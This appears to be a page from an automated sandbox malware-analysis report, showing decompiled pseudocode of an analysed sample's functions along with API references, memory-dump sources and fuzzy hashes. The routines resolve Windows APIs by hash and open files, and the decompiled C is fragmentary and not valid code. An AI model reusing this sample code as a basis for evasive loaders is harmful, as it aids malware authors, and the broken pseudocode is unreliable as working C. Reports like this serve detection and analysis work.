0x6eb657d7
0x6eb657e0
0x6eb657e3
0x6eb657fa
0x6eb6580b
0x6eb6580b
0x6eb6580d
0x6eb65813
0x6eb6581e
0x6eb65836
0x6eb65856
0x6eb65856
0x6eb65858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb657d7
0x6eb65860

APIs

RegQueryValueExA.KERNELBASE(?,6EB6D1F8,00000000,?,00000000,00000000,?,?,?,6EB6D1F8,?,6EB65887,?,00000000,00000000), ref: 6EB6580B
RegQueryValueExA.KERNELBASE(?,6EB6D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6EB6D1F8,?,6EB65887,?,00000000), ref: 6EB65856

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: 9782d3d450338f108e276b5f832ad643ec1b9bd0bcf5df94d0a3d67176ab2fd1
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: CA11A23021A386ABDA519AA5DC90EABBFDCEF46754F008D1DF59487142EB21E810CB79

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EB65B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6EB5D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6EB5D6D0(__ecx, _t60);
					E6EB5CFF8(_t56,  *_t60);
					E6EB5CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6EB662B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6EB5C26C(_t40);
					if(E6EB5C280(_t40) != 0) {
						_t56[2] = E6EB635F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6EB63064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6EB63698(_t59, 0xff, 8);
						if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6eb65b43
0x6eb65b45
0x6eb65b52
0x6eb65b56
0x6eb65b5a
0x6eb65b64
0x6eb65b6b
0x6eb65b6b
0x6eb65b72
0x6eb65b74
0x6eb65b79
0x6eb65b82
0x6eb65b8a
0x6eb65b8a
0x6eb65b7b
0x6eb65b7d
0x6eb65b7d
0x6eb65b79
0x6eb65b8f
0x6eb65b9b
0x6eb65ccc
0x6eb65c09
0x6eb65c12
0x6eb65c13
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x00000000
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cae
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x00000000
0x6eb65c92
0x6eb65ba1
0x6eb65bb1
0x6eb65bb1

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77620a8b06ff729e24195272cd365f8a49b0a77aea9f0041f90f66a8bf82ddb8
Instruction ID: dfaa00799b604df55d97f00fbfb3d738ff6012fb8a099424d13e30347ef4d1bc
Opcode Fuzzy Hash: 77620a8b06ff729e24195272cd365f8a49b0a77aea9f0041f90f66a8bf82ddb8
Instruction Fuzzy Hash: 5831653025638ABEEB502AF54D94F6F7F9DDFC1748F004C39FA419A286DE219878C625

Uniqueness

Uniqueness Score: -1.00%

Function 028026AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E02801ED2(__eflags);
				_t29 = E0280180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E0280200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E02801000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E028016D7();
				 *_t56 = _v20; // executed
				E02802092(_t47, _t54, _t55); // executed
				return 0;
			}

0x028026aa
0x028026b3
0x028026b6
0x028026b9
0x028026c1
0x028026c4
0x028026cc
0x028026cf
0x028026d4
0x028026da
0x028026dd
0x028026e0
0x028026e0
0x0280270e
0x02802711
0x02802719
0x0280271c
0x0280271f
0x02802727
0x0280272a
0x0280272d
0x02802734
0x02802736
0x02802739
0x0280273c
0x0280273f
0x02802742
0x02802706
0x02802706
0x0280276e
0x028026ea
0x028026ec
0x028026ec
0x02802749
0x0280274c
0x02802754
0x02802757
0x02802765

APIs

FreeConsole.KERNELBASE ref: 028026EA

Memory Dump Source

Source File: 00000001.00000002.821406610.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: a9d335555ffe3358df19a5e2ca241aab983bb676c334f70e63314c2c84d01d62
Instruction ID: 644e181e1c0bb8024ab16c793701377e708a974af07e4c56fed07daa62415eb6
Opcode Fuzzy Hash: a9d335555ffe3358df19a5e2ca241aab983bb676c334f70e63314c2c84d01d62
Instruction Fuzzy Hash: A621C5B9D0421A8BCB80EFA9C8C89AEBBF5FF08314F144429D959E7384E775A940CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6EB61166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB61166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6eb61168
0x6eb6116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EB6117B

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 1d1d2cc22cc3dbcba12d46e75df89a41078c752f2be240e955f79d2c5eabc5aa
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: 761106316042C35AFF5685E8D870BAF7F68DF82700F184875E968EA1E4CA24C889C662

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EB65BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EB5C26C(_t24);
				if(E6EB5C280(_t24) != 0) {
					_t34[2] = E6EB635F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6EB63064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6EB63698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6eb65bbd
0x6eb65bc1
0x6eb65bc4
0x6eb65bc7
0x6eb65c09
0x6eb65c12
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x6eb65cc6
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c72
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x6eb65c92
0x6eb65c92
0x6eb65c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB65C3E

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: d3d0aaa2e93fa604d18fd4bef1da302fa1758517efb2f0e095bf639f66fabbc3
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: E801D23129538ABAFA5026E54D45F7B7F8DDFC2758F008C35FA0155186DE12A8A9C125

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EB65BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6EB5C26C(_t24);
					if(E6EB5C280(_t24) != 0) {
						_t33[2] = E6EB635F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6EB63064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6EB63698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6eb65be5
0x6eb65be7
0x6eb65bfe
0x6eb65c09
0x6eb65c12
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x6eb65cc6
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c72
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x6eb65c92
0x6eb65c92
0x6eb65be9
0x6eb65be9
0x6eb65bf0
0x6eb65bf0
0x6eb65c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB65C3E

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: dd5b2972dbad2b52c7b1833cbbd466526d0c864e44c6f2f0d1a7c23bcd7a97e3
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 57012631296286BAFB901AE54C44F6B7F4DDB82348F004C35FA0155186DF22A4B8C129

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EB65BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EB5C26C(_t24);
				if(E6EB5C280(_t24) != 0) {
					_t34[2] = E6EB635F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6EB63064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6EB63698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6eb65bd1
0x6eb65bd8
0x6eb65bdb
0x6eb65c09
0x6eb65c12
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x6eb65cc6
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c72
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x6eb65c92
0x6eb65c92
0x6eb65c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB65C3E

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: ec4fe3b1e99fc595244986bf748fcc224ee38437c080345261df3096d121a833
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 4F01F53529628A7AFB5026E54D44F7F7F4DDBC2358F004C35FA01951C6DE22A8B9C125

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EB65BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EB5C26C(_t23);
				if(E6EB5C280(_t23) != 0) {
					_t31[2] = E6EB635F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EB63064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EB63698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6eb65bb3
0x6eb65bba
0x6eb65c09
0x6eb65c12
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x6eb65cc6
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c72
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x6eb65c92
0x6eb65c92
0x6eb65c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB65C3E

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 7533ed17efae746dffcc9f70ce211e6355980f0cd045f2f6817aeed208b98d33
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: B301473129628ABAFB902AE44C44F7F7F4DCF82358F004C35FA01651C6DE12A8B8C129

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EB65C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EB63064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EB5C26C(_t23);
				if(E6EB5C280(_t23) != 0) {
					_t31[2] = E6EB635F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EB63064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EB63698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EB63064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6eb65c01
0x6eb65c05
0x6eb65c09
0x6eb65c12
0x6eb65c18
0x6eb65c19
0x6eb65c0b
0x6eb65c0d
0x6eb65c0d
0x6eb65c2f
0x6eb65c43
0x6eb65c31
0x6eb65c3e
0x6eb65c40
0x6eb65c40
0x6eb65c45
0x6eb65c4a
0x6eb65c58
0x6eb65cc3
0x6eb65cc6
0x6eb65c5a
0x6eb65c5f
0x6eb65cac
0x6eb65cb0
0x6eb65cba
0x6eb65cba
0x6eb65cb0
0x6eb65c61
0x6eb65c6d
0x6eb65c72
0x6eb65c86
0x6eb65c88
0x6eb65c89
0x6eb65c8a
0x6eb65c8c
0x6eb65c8e
0x6eb65c8f
0x6eb65c8f
0x6eb65c92
0x6eb65c92
0x6eb65c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EB65C3E

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 7ce98978c4af88829114978821f07e35f8cce58eb7cf6325754f0ceb62942415
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 3D01423129228ABAEAA02AE04D44F7F7F4DCF82758F004C35FA0165186DE22A8B8C124

Uniqueness

Uniqueness Score: -1.00%

Function 6EB65E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6EB65E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6EB5C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6EB63064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6eb65e14
0x6eb65e15
0x6eb65e17
0x6eb65e1d
0x6eb65e1f
0x6eb65e23
0x6eb65e23
0x6eb65e27
0x6eb65e33
0x6eb65e67
0x6eb65e67
0x00000000
0x6eb65e35
0x6eb65e3a
0x6eb65e3b
0x6eb65e4f
0x6eb65e60
0x6eb65e51
0x6eb65e5c
0x6eb65e5c
0x6eb65e65
0x6eb65e6d
0x6eb65e6f
0x6eb65e72
0x6eb65e77
0x6eb65e77
0x6eb65e7b
0x6eb65e80
0x00000000
0x00000000
0x00000000
0x6eb65e65

APIs

